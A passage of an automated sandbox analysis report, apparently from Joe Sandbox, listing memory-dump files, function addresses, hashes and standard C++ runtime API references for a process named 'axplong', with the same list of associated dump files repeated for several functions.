                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: pBg
                                                                                                                                                                                                                                                    • API String ID: 3308344742-3123275838
                                                                                                                                                                                                                                                    • Opcode ID: 652cd9afdb84f82f4fba811b5ff05c2c96f1c7d4d4f739787288c6fe4439eea5
                                                                                                                                                                                                                                                    • Instruction ID: d0d42343456187ffac65337fab9eca8acbb46d4f39e50d4b318f5bb3c63f66b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 652cd9afdb84f82f4fba811b5ff05c2c96f1c7d4d4f739787288c6fe4439eea5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD31D271600B109FDB249F28D885BA6B7E6FF54724F088A5DE85ACB391DB34ED04CB90
                                                                                                                                                                                                                                                    Function 006A1757 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006A17D1
                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006A1818
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                                                                                                    • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                    • Opcode ID: 8a464f2ff47cdb790a6ccc58c1f90f495ca942de62a1026b6873348ce9585c5c
                                                                                                                                                                                                                                                    • Instruction ID: ee3d3c7d4aa8486ea13d9292001904e3ebd1ac98be41ccb495b57d2b58ae4f94
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a464f2ff47cdb790a6ccc58c1f90f495ca942de62a1026b6873348ce9585c5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621E5367006159BCB14BB68C895ABDB3A7BF87324F04451EE5118F3D1CB68EC428F95
                                                                                                                                                                                                                                                    Function 0069AD95 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • List.LIBCONCRT ref: 0069AE1A
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0069AE3F
                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0069AE7E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pExecutionResource
                                                                                                                                                                                                                                                    • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                                    • Opcode ID: ad07227b53ccb4a9adb59fb9ac156aaba507925d9c5f353818412512affba639
                                                                                                                                                                                                                                                    • Instruction ID: 7f249f587bcf47bf87035f0b1766c3da50e42925c264acfd279c71d8b976e84b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad07227b53ccb4a9adb59fb9ac156aaba507925d9c5f353818412512affba639
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF2171B5A40205ABCF48FFA4C852BAD77B7AF88300F11411DF5016B382DBB4EE459BA5
                                                                                                                                                                                                                                                    Function 00694DD2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00694E54
                                                                                                                                                                                                                                                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00694E96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
